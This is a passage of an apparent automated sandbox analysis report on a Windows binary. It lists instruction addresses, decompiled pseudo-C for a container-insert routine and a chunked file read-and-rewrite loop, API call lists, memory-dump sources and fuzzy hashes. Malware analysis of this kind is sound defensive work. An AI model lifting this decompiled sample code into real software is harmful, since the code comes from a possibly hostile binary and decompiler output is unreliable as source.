                                                                                                                                                                                          0x00c84e9e
                                                                                                                                                                                          0x00c84e9e
                                                                                                                                                                                          0x00c84ea2
                                                                                                                                                                                          0x00c84ea6
                                                                                                                                                                                          0x00c84ea6
                                                                                                                                                                                          0x00c84eb1
                                                                                                                                                                                          0x00c84eb3
                                                                                                                                                                                          0x00c84eb7
                                                                                                                                                                                          0x00c84ebe
                                                                                                                                                                                          0x00c84ebe
                                                                                                                                                                                          0x00c84ec4
                                                                                                                                                                                          0x00c84ec8
                                                                                                                                                                                          0x00c84ed1
                                                                                                                                                                                          0x00c84ed1
                                                                                                                                                                                          0x00c84ed2
                                                                                                                                                                                          0x00c84eca
                                                                                                                                                                                          0x00c84eca
                                                                                                                                                                                          0x00c84eca
                                                                                                                                                                                          0x00c84ed6
                                                                                                                                                                                          0x00c84ed8
                                                                                                                                                                                          0x00c84f68
                                                                                                                                                                                          0x00c84f68
                                                                                                                                                                                          0x00c84f6c
                                                                                                                                                                                          0x00c84f70
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84f76
                                                                                                                                                                                          0x00c84f76
                                                                                                                                                                                          0x00c84f78
                                                                                                                                                                                          0x00c84f7a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84f80
                                                                                                                                                                                          0x00c84f80
                                                                                                                                                                                          0x00c84f84
                                                                                                                                                                                          0x00c84fd3
                                                                                                                                                                                          0x00c84fd3
                                                                                                                                                                                          0x00c84fd7
                                                                                                                                                                                          0x00c84fd9
                                                                                                                                                                                          0x00c8500d
                                                                                                                                                                                          0x00c8500f
                                                                                                                                                                                          0x00c85012
                                                                                                                                                                                          0x00c85018
                                                                                                                                                                                          0x00c8501b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84fdb
                                                                                                                                                                                          0x00c84fdb
                                                                                                                                                                                          0x00c84fdf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84fe1
                                                                                                                                                                                          0x00c84fe1
                                                                                                                                                                                          0x00c84fe3
                                                                                                                                                                                          0x00c84fe8
                                                                                                                                                                                          0x00c85066
                                                                                                                                                                                          0x00c8506e
                                                                                                                                                                                          0x00c85077
                                                                                                                                                                                          0x00c84fea
                                                                                                                                                                                          0x00c84fee
                                                                                                                                                                                          0x00c84ffd
                                                                                                                                                                                          0x00c85003
                                                                                                                                                                                          0x00c85005
                                                                                                                                                                                          0x00c85007
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85009
                                                                                                                                                                                          0x00c85009
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c85009
                                                                                                                                                                                          0x00c85007
                                                                                                                                                                                          0x00c84fe8
                                                                                                                                                                                          0x00c84fdf
                                                                                                                                                                                          0x00c84f86
                                                                                                                                                                                          0x00c84f86
                                                                                                                                                                                          0x00c84f8c
                                                                                                                                                                                          0x00c84f91
                                                                                                                                                                                          0x00c84f97
                                                                                                                                                                                          0x00c84f99
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84f9f
                                                                                                                                                                                          0x00c84fa3
                                                                                                                                                                                          0x00c84fa8
                                                                                                                                                                                          0x00c84faa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84fb0
                                                                                                                                                                                          0x00c84fb0
                                                                                                                                                                                          0x00c84fb4
                                                                                                                                                                                          0x00c84fb6
                                                                                                                                                                                          0x00c84fcf
                                                                                                                                                                                          0x00c84fcf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84fb8
                                                                                                                                                                                          0x00c84fc5
                                                                                                                                                                                          0x00c84fc7
                                                                                                                                                                                          0x00c84fc9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84fc9
                                                                                                                                                                                          0x00c84fb6
                                                                                                                                                                                          0x00c84faa
                                                                                                                                                                                          0x00c84f99
                                                                                                                                                                                          0x00c84f84
                                                                                                                                                                                          0x00c84f7a
                                                                                                                                                                                          0x00c84ede
                                                                                                                                                                                          0x00c84ede
                                                                                                                                                                                          0x00c84ee2
                                                                                                                                                                                          0x00c84ee9
                                                                                                                                                                                          0x00c84eef
                                                                                                                                                                                          0x00c84ef1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84f05
                                                                                                                                                                                          0x00c84f0b
                                                                                                                                                                                          0x00c84f0d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84f13
                                                                                                                                                                                          0x00c84f13
                                                                                                                                                                                          0x00c84f17
                                                                                                                                                                                          0x00c8504a
                                                                                                                                                                                          0x00c85052
                                                                                                                                                                                          0x00c8505b
                                                                                                                                                                                          0x00c84f1d
                                                                                                                                                                                          0x00c84f1d
                                                                                                                                                                                          0x00c84f21
                                                                                                                                                                                          0x00c84f23
                                                                                                                                                                                          0x00c84f36
                                                                                                                                                                                          0x00c84f36
                                                                                                                                                                                          0x00c84f3a
                                                                                                                                                                                          0x00c84f3c
                                                                                                                                                                                          0x00c84f4f
                                                                                                                                                                                          0x00c84f4f
                                                                                                                                                                                          0x00c84f51
                                                                                                                                                                                          0x00c84f54
                                                                                                                                                                                          0x00c84f54
                                                                                                                                                                                          0x00c84f54
                                                                                                                                                                                          0x00c84f59
                                                                                                                                                                                          0x00c84f5e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84f64
                                                                                                                                                                                          0x00c84f64
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84f64
                                                                                                                                                                                          0x00c84f3e
                                                                                                                                                                                          0x00c84f45
                                                                                                                                                                                          0x00c84f47
                                                                                                                                                                                          0x00c84f49
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84f49
                                                                                                                                                                                          0x00c84f25
                                                                                                                                                                                          0x00c84f2c
                                                                                                                                                                                          0x00c84f2e
                                                                                                                                                                                          0x00c84f30
                                                                                                                                                                                          0x00c85078
                                                                                                                                                                                          0x00c85082
                                                                                                                                                                                          0x00c8508d
                                                                                                                                                                                          0x00c8508d
                                                                                                                                                                                          0x00c85093
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84f30
                                                                                                                                                                                          0x00c84f23
                                                                                                                                                                                          0x00c84f17
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84f0d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84ede
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8501d
                                                                                                                                                                                          0x00c8501d
                                                                                                                                                                                          0x00c8501e
                                                                                                                                                                                          0x00c85021
                                                                                                                                                                                          0x00c85025
                                                                                                                                                                                          0x00c85029
                                                                                                                                                                                          0x00c85029
                                                                                                                                                                                          0x00c8503f
                                                                                                                                                                                          0x00c84e63
                                                                                                                                                                                          0x00c84e63
                                                                                                                                                                                          0x00c84e63
                                                                                                                                                                                          0x00c84e68
                                                                                                                                                                                          0x00c84e6a
                                                                                                                                                                                          0x00c84e71
                                                                                                                                                                                          0x00c84e82
                                                                                                                                                                                          0x00c84e82
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(?,?,?,?,?,00000000,00000002,Function_00001C60,?,?,?,?), ref: 00C84E59
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000002,Function_00001C60,?,?), ref: 00C84EE9
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00000000,00000002,Function_00001C60,?,?), ref: 00C84F05
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000002,Function_00001C60,?,?), ref: 00C84F91
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Pointer$ReadSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1971422761-0
                                                                                                                                                                                          • Opcode ID: 78374c87c460da5d0fb740b816b3d3c0fdf61a83531b090d64ddfb5241841992
                                                                                                                                                                                          • Instruction ID: bf69f6fa90df6b2f27737e32a6668d112f6c86d9610fc040f1453c7ea6262a89
                                                                                                                                                                                          • Opcode Fuzzy Hash: 78374c87c460da5d0fb740b816b3d3c0fdf61a83531b090d64ddfb5241841992
                                                                                                                                                                                          • Instruction Fuzzy Hash: D961C0317042025FD724EA69DC80B2BB7E9FBC5718F54482CF954D7280DB76EE0987A6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CEA4AD Relevance: 7.6, APIs: 5, Instructions: 149COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E00CEA4AD(void* __ecx, void* __eflags, intOrPtr* _a8, signed int _a12, char _a16) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t64;
				void* _t65;
				unsigned int _t72;
				signed int _t73;
				intOrPtr _t80;
				void* _t86;
				intOrPtr _t87;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t103;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				void* _t135;
				void* _t138;

				_push(__ecx);
				_t135 = __ecx;
				_t64 = E00CE98AD(__ecx);
				_t129 = _a12;
				_v8 = _t64;
				if(_t129 != 0) {
					_t3 = _t135 + 0x10; // 0x2a26d4c
					_t65 =  *_t3;
					_t4 = _t135 + 0xc; // 0x2a26d48
					_t98 = _t65 -  *_t4 >> 2;
					_t86 = 0x3fffffff - _t98;
					_a12 = _t65;
					_t143 = 0x3fffffff - _t129;
					if(0x3fffffff < _t129) {
						_t65 = E00CEA3EB(_t86, _t129, __ecx, _t143);
					}
					_t99 = _t98 + _t129;
					if(_v8 >= _t99) {
						_t100 = _a8;
						__eflags = _t65 - _t100 >> 2 - _t129;
						if(_t65 - _t100 >> 2 >= _t129) {
							_t87 =  *_a16;
							_t131 = _t129 << 2;
							_a16 = _t65;
							_a16 = _a16 - _t131;
							 *((intOrPtr*)(_t135 + 0x10)) = E00CEA29C(_t135, _a16, _t65, _t65);
							E00CE9FA9(_t135, _a8, _a16, _a12);
							_t64 = _a8;
							_t103 = _t131 + _t64;
							while(1) {
								__eflags = _t64 - _t103;
								if(_t64 == _t103) {
									goto L20;
								}
								 *_t64 = _t87;
								_t64 = _t64 + 4;
								__eflags = _t64;
							}
						} else {
							_a16 =  *_a16;
							_t90 = _t129 << 2;
							E00CEA29C(_t135, _t100, _t65, _t90 + _t100);
							_t45 = _t135 + 0x10; // 0x2a26d4c
							E00CEA348( *_t45, _t129 - ( *_t45 - _a8 >> 2),  &_a16);
							 *((intOrPtr*)(_t135 + 0x10)) =  *((intOrPtr*)(_t135 + 0x10)) + _t90;
							_t50 = _t135 + 0x10; // 0x2a26d4c
							_t64 = _a8;
							_t138 =  *_t50 - _t90;
							while(1) {
								__eflags = _t64 - _t138;
								if(_t64 == _t138) {
									break;
								}
								 *_t64 = _a16;
								_t64 = _t64 + 4;
								__eflags = _t64;
							}
						}
					} else {
						_t72 = _v8 >> 1;
						_t127 = 0x3fffffff - _t72;
						if(0x3fffffff - _t72 >= _v8) {
							_t11 =  &_v8;
							 *_t11 = _v8 + _t72;
							__eflags =  *_t11;
						} else {
							_v8 = _v8 & 0x00000000;
						}
						if(_v8 < _t99) {
							_v8 = _t99;
						}
						_push(0);
						_t73 = E00CE9D10(_t86, _t129, _v8);
						_t17 = _t135 + 0xc; // 0x2a26d48
						_a12 = _t73;
						E00CEA348(_t73 + (_a8 -  *_t17 >> 2) * 4, _t129, _a16);
						_t24 = _t135 + 0xc; // 0x2a26d48
						E00CEA29C(_t135,  *_t24, _a8, _a12);
						_t94 = _a12;
						_t29 = _t135 + 0x10; // 0x2a26d4c
						E00CEA29C(_t135, _a8,  *_t29, _t94 + ((_a8 -  *_t17 >> 2) + _t129) * 4);
						_t31 = _t135 + 0xc; // 0x2a26d48
						_t80 =  *_t31;
						_t32 = _t135 + 0x10; // 0x2a26d4c
						_t133 = _t129 + ( *_t32 - _t80 >> 2);
						_t147 = _t80;
						if(_t80 != 0) {
							E00D0068E(_t94, _t127, _t133, _t135, _t147, _t80);
						}
						 *((intOrPtr*)(_t135 + 0x14)) = _t94 + _v8 * 4;
						_t64 = _t94 + _t133 * 4;
						 *((intOrPtr*)(_t135 + 0x10)) = _t64;
						 *(_t135 + 0xc) = _t94;
					}
					L20:
				}
				return _t64;
			}


























                                                                                                                                                                                          0x00cea4b0
                                                                                                                                                                                          0x00cea4b3
                                                                                                                                                                                          0x00cea4b5
                                                                                                                                                                                          0x00cea4ba
                                                                                                                                                                                          0x00cea4bd
                                                                                                                                                                                          0x00cea4c2
                                                                                                                                                                                          0x00cea4c8
                                                                                                                                                                                          0x00cea4c8
                                                                                                                                                                                          0x00cea4cd
                                                                                                                                                                                          0x00cea4d6
                                                                                                                                                                                          0x00cea4db
                                                                                                                                                                                          0x00cea4dd
                                                                                                                                                                                          0x00cea4e0
                                                                                                                                                                                          0x00cea4e2
                                                                                                                                                                                          0x00cea4e4
                                                                                                                                                                                          0x00cea4e4
                                                                                                                                                                                          0x00cea4e9
                                                                                                                                                                                          0x00cea4ee
                                                                                                                                                                                          0x00cea58e
                                                                                                                                                                                          0x00cea598
                                                                                                                                                                                          0x00cea59a
                                                                                                                                                                                          0x00cea5ee
                                                                                                                                                                                          0x00cea5f1
                                                                                                                                                                                          0x00cea5f4
                                                                                                                                                                                          0x00cea5f7
                                                                                                                                                                                          0x00cea608
                                                                                                                                                                                          0x00cea611
                                                                                                                                                                                          0x00cea616
                                                                                                                                                                                          0x00cea61c
                                                                                                                                                                                          0x00cea626
                                                                                                                                                                                          0x00cea626
                                                                                                                                                                                          0x00cea628
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cea621
                                                                                                                                                                                          0x00cea623
                                                                                                                                                                                          0x00cea623
                                                                                                                                                                                          0x00cea623
                                                                                                                                                                                          0x00cea59c
                                                                                                                                                                                          0x00cea5a3
                                                                                                                                                                                          0x00cea5a6
                                                                                                                                                                                          0x00cea5b1
                                                                                                                                                                                          0x00cea5b6
                                                                                                                                                                                          0x00cea5cb
                                                                                                                                                                                          0x00cea5d0
                                                                                                                                                                                          0x00cea5d3
                                                                                                                                                                                          0x00cea5d6
                                                                                                                                                                                          0x00cea5d9
                                                                                                                                                                                          0x00cea5e5
                                                                                                                                                                                          0x00cea5e5
                                                                                                                                                                                          0x00cea5e7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cea5e0
                                                                                                                                                                                          0x00cea5e2
                                                                                                                                                                                          0x00cea5e2
                                                                                                                                                                                          0x00cea5e2
                                                                                                                                                                                          0x00cea5e9
                                                                                                                                                                                          0x00cea4f4
                                                                                                                                                                                          0x00cea4f7
                                                                                                                                                                                          0x00cea4f9
                                                                                                                                                                                          0x00cea4fe
                                                                                                                                                                                          0x00cea506
                                                                                                                                                                                          0x00cea506
                                                                                                                                                                                          0x00cea506
                                                                                                                                                                                          0x00cea500
                                                                                                                                                                                          0x00cea500
                                                                                                                                                                                          0x00cea500
                                                                                                                                                                                          0x00cea50c
                                                                                                                                                                                          0x00cea50e
                                                                                                                                                                                          0x00cea50e
                                                                                                                                                                                          0x00cea511
                                                                                                                                                                                          0x00cea516
                                                                                                                                                                                          0x00cea51e
                                                                                                                                                                                          0x00cea526
                                                                                                                                                                                          0x00cea533
                                                                                                                                                                                          0x00cea540
                                                                                                                                                                                          0x00cea543
                                                                                                                                                                                          0x00cea54b
                                                                                                                                                                                          0x00cea552
                                                                                                                                                                                          0x00cea55a
                                                                                                                                                                                          0x00cea55f
                                                                                                                                                                                          0x00cea55f
                                                                                                                                                                                          0x00cea562
                                                                                                                                                                                          0x00cea56a
                                                                                                                                                                                          0x00cea56c
                                                                                                                                                                                          0x00cea56e
                                                                                                                                                                                          0x00cea571
                                                                                                                                                                                          0x00cea576
                                                                                                                                                                                          0x00cea57d
                                                                                                                                                                                          0x00cea580
                                                                                                                                                                                          0x00cea583
                                                                                                                                                                                          0x00cea586
                                                                                                                                                                                          0x00cea586
                                                                                                                                                                                          0x00cea62a
                                                                                                                                                                                          0x00cea62a
                                                                                                                                                                                          0x00cea62e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_String_base::_Xlen.LIBCPMT ref: 00CEA4E4
                                                                                                                                                                                            • Part of subcall function 00CEA3EB: __EH_prolog3.LIBCMT ref: 00CEA3F2
                                                                                                                                                                                            • Part of subcall function 00CEA3EB: __CxxThrowException@8.LIBCMT ref: 00CEA424
                                                                                                                                                                                            • Part of subcall function 00CEA3EB: __EH_prolog3.LIBCMT ref: 00CEA431
                                                                                                                                                                                            • Part of subcall function 00CEA3EB: __CxxThrowException@8.LIBCMT ref: 00CEA463
                                                                                                                                                                                          • ctype.LIBCPMT ref: 00CEA543
                                                                                                                                                                                          • ctype.LIBCPMT ref: 00CEA55A
                                                                                                                                                                                          • ctype.LIBCPMT ref: 00CEA5B1
                                                                                                                                                                                          • ctype.LIBCPMT ref: 00CEA600
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ctype$Exception@8H_prolog3Throw$String_base::_Xlenstd::_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 79847347-0
                                                                                                                                                                                          • Opcode ID: 901acc404fc5216a5cb209a641eda274c4726172448c5baf7a472d044acdffba
                                                                                                                                                                                          • Instruction ID: f0caeb1dc6d377d3555c1e9a7faef11f3480e94b8b57feaeec8804b5bd5d89b9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 901acc404fc5216a5cb209a641eda274c4726172448c5baf7a472d044acdffba
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5517C71A007499FCF25DF6AD9818AE77B5FB84310B148A2DF81697240EB70FE10DB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C83FD0 Relevance: 7.6, APIs: 5, Instructions: 135fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                          			E00C83FD0(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				intOrPtr _v0;
				void* _v4;
				char _v8;
				union _LARGE_INTEGER* _v12;
				intOrPtr _v16;
				union _LARGE_INTEGER _v24;
				long _v28;
				long _v32;
				struct _OVERLAPPED* _v36;
				long _v40;
				char* _t33;
				signed int _t36;
				long _t37;
				int _t41;
				int _t45;
				int _t50;
				int _t52;
				struct _OVERLAPPED* _t54;
				signed int _t56;
				long _t57;
				union _LARGE_INTEGER _t58;
				intOrPtr _t60;
				intOrPtr _t66;
				union _LARGE_INTEGER* _t72;
				long _t75;
				union _LARGE_INTEGER* _t76;

				_t33 =  &_v8;
				__imp__GetFileSizeEx(_a4, _t33);
				if(_t33 != 0) {
					_t72 = _v12;
					__eflags = _a4 - _t72;
					if(__eflags > 0) {
						L16:
						return 1;
					} else {
						_t60 = _v0;
						_t66 = _v16;
						if(__eflags < 0) {
							L5:
							_t36 = _t66 - _t60;
							asm("sbb ecx, esi");
							_t56 = (_t72 << 0x00000020 | _t36) >> 0xf;
							_t37 = _t36 & 0x00007fff;
							__eflags = _t37;
							_v40 = _t56;
							_t75 = _t37;
							if(_t37 != 0) {
								_t57 = _t56 + 1;
								__eflags = _t57;
								_v40 = _t57;
							} else {
								_t75 = 0x8000;
							}
							asm("sbb edi, eax");
							_t76 = _t72;
							_t58 = _t66 - _t75;
							asm("adc edi, ebp");
							__eflags = _v40;
							_v24.LowPart = _a8 + _t58;
							_v36 = 0;
							if(_v40 <= 0) {
								goto L16;
							} else {
								while(1) {
									_push(0);
									_t41 = SetFilePointerEx(_v4, _t58, _t76, 0);
									__eflags = _t41;
									if(_t41 == 0) {
										goto L1;
									}
									_t45 = ReadFile(_v4, _a12, _t75,  &_v32, 0);
									__eflags = _t45;
									if(_t45 == 0) {
										goto L1;
									} else {
										__eflags = _t75 - _v32;
										if(_t75 != _v32) {
											L17:
											E00C88420(1, 0xd47270);
											__eflags = 0;
											return 0;
										} else {
											_push(0);
											_t50 = SetFilePointerEx(_v4, _v24.LowPart, 0, 0);
											__eflags = _t50;
											if(_t50 == 0) {
												goto L1;
											} else {
												_t52 = WriteFile(_v4, _a12, _t75,  &_v28, 0);
												__eflags = _t52;
												if(_t52 == 0) {
													goto L1;
												} else {
													__eflags = _t75 - _v28;
													if(_t75 != _v28) {
														goto L17;
													} else {
														_t58 = _t58 + 0xffff8000;
														asm("adc ebp, 0xffffffff");
														_v24.LowPart = _v24 + 0xffff8000;
														_t75 = 0x8000;
														asm("adc edi, 0xffffffff");
														_t54 =  &(_v36->Internal);
														_v36 = _t54;
														__eflags = _t54 - _v40;
														if(_t54 < _v40) {
															continue;
														} else {
															goto L16;
														}
													}
												}
											}
										}
									}
									goto L18;
								}
								goto L1;
							}
						} else {
							__eflags = _t60 - _t66;
							if(_t60 >= _t66) {
								goto L16;
							} else {
								goto L5;
							}
						}
					}
				} else {
					L1:
					_push(0xd47270);
					_push(0);
					_push(0);
					E00C88150(0xd47270);
					return 0;
				}
				L18:
			}





























                                                                                                                                                                                          0x00c83fdb
                                                                                                                                                                                          0x00c83fe1
                                                                                                                                                                                          0x00c83fe9
                                                                                                                                                                                          0x00c8400f
                                                                                                                                                                                          0x00c84013
                                                                                                                                                                                          0x00c84015
                                                                                                                                                                                          0x00c84133
                                                                                                                                                                                          0x00c8413c
                                                                                                                                                                                          0x00c8401b
                                                                                                                                                                                          0x00c8401b
                                                                                                                                                                                          0x00c8401f
                                                                                                                                                                                          0x00c84023
                                                                                                                                                                                          0x00c8402d
                                                                                                                                                                                          0x00c8402f
                                                                                                                                                                                          0x00c84033
                                                                                                                                                                                          0x00c84037
                                                                                                                                                                                          0x00c8403e
                                                                                                                                                                                          0x00c8403e
                                                                                                                                                                                          0x00c84043
                                                                                                                                                                                          0x00c84047
                                                                                                                                                                                          0x00c84049
                                                                                                                                                                                          0x00c84052
                                                                                                                                                                                          0x00c84052
                                                                                                                                                                                          0x00c84053
                                                                                                                                                                                          0x00c8404b
                                                                                                                                                                                          0x00c8404b
                                                                                                                                                                                          0x00c8404b
                                                                                                                                                                                          0x00c8405b
                                                                                                                                                                                          0x00c84061
                                                                                                                                                                                          0x00c84065
                                                                                                                                                                                          0x00c84069
                                                                                                                                                                                          0x00c8406b
                                                                                                                                                                                          0x00c84070
                                                                                                                                                                                          0x00c84074
                                                                                                                                                                                          0x00c8407c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84082
                                                                                                                                                                                          0x00c84082
                                                                                                                                                                                          0x00c84086
                                                                                                                                                                                          0x00c8408d
                                                                                                                                                                                          0x00c84093
                                                                                                                                                                                          0x00c84095
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c840ad
                                                                                                                                                                                          0x00c840b3
                                                                                                                                                                                          0x00c840b5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c840bb
                                                                                                                                                                                          0x00c840bb
                                                                                                                                                                                          0x00c840bf
                                                                                                                                                                                          0x00c8413d
                                                                                                                                                                                          0x00c84147
                                                                                                                                                                                          0x00c84152
                                                                                                                                                                                          0x00c84158
                                                                                                                                                                                          0x00c840c1
                                                                                                                                                                                          0x00c840c9
                                                                                                                                                                                          0x00c840d0
                                                                                                                                                                                          0x00c840d6
                                                                                                                                                                                          0x00c840d8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c840de
                                                                                                                                                                                          0x00c840f0
                                                                                                                                                                                          0x00c840f6
                                                                                                                                                                                          0x00c840f8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c840fe
                                                                                                                                                                                          0x00c840fe
                                                                                                                                                                                          0x00c84102
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84104
                                                                                                                                                                                          0x00c84108
                                                                                                                                                                                          0x00c8410e
                                                                                                                                                                                          0x00c84111
                                                                                                                                                                                          0x00c84119
                                                                                                                                                                                          0x00c8411e
                                                                                                                                                                                          0x00c84121
                                                                                                                                                                                          0x00c84122
                                                                                                                                                                                          0x00c84126
                                                                                                                                                                                          0x00c8412a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8412a
                                                                                                                                                                                          0x00c84102
                                                                                                                                                                                          0x00c840f8
                                                                                                                                                                                          0x00c840d8
                                                                                                                                                                                          0x00c840bf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c840b5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84082
                                                                                                                                                                                          0x00c84025
                                                                                                                                                                                          0x00c84025
                                                                                                                                                                                          0x00c84027
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84027
                                                                                                                                                                                          0x00c84023
                                                                                                                                                                                          0x00c83feb
                                                                                                                                                                                          0x00c83feb
                                                                                                                                                                                          0x00c83feb
                                                                                                                                                                                          0x00c83ff0
                                                                                                                                                                                          0x00c83ff2
                                                                                                                                                                                          0x00c83ff9
                                                                                                                                                                                          0x00c8400a
                                                                                                                                                                                          0x00c8400a
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(?,?), ref: 00C83FE1
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 00C8408D
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00C840AD
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000000), ref: 00C840D0
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C840F0
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
